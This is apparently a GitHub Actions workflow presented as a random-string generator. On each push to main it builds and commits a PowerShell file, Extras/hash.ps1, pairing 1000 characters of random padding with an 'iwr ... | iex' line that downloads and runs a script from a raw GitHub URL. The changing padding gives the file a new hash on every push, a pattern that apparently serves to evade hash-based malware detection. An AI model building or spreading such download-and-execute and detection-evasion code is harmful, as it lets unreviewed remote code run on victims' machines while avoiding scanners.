name: Generate Random String on Push to Main

on:
  push:
    branches:
      - main

permissions:
  contents: write  # Grant write permission to contents (source code)

jobs:
  generate-random-string:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v2
      with:
        token: ${{ secrets.GITHUB_TOKEN }}

    - name: Generate random string and create PowerShell script
      run: |
        mkdir -p Extras
        RANDOM_STRING=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c 1000)
        echo '$hash = "'$RANDOM_STRING'"' > Extras/hash.ps1
        echo 'iwr https://raw.githubusercontent.com/43a1723/test/main/Extras/hash.ps1 -UseBasicParsing | iex' >> Extras/hash.ps1

    - name: Commit and push changes
      run: |
        git config --global user.name 'github-actions'
        git config --global user.email 'github-actions@github.com'
        git add Extras/hash.ps1
        git commit -m "Add random string to Extras/hash.ps1"
        git push
      env:
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
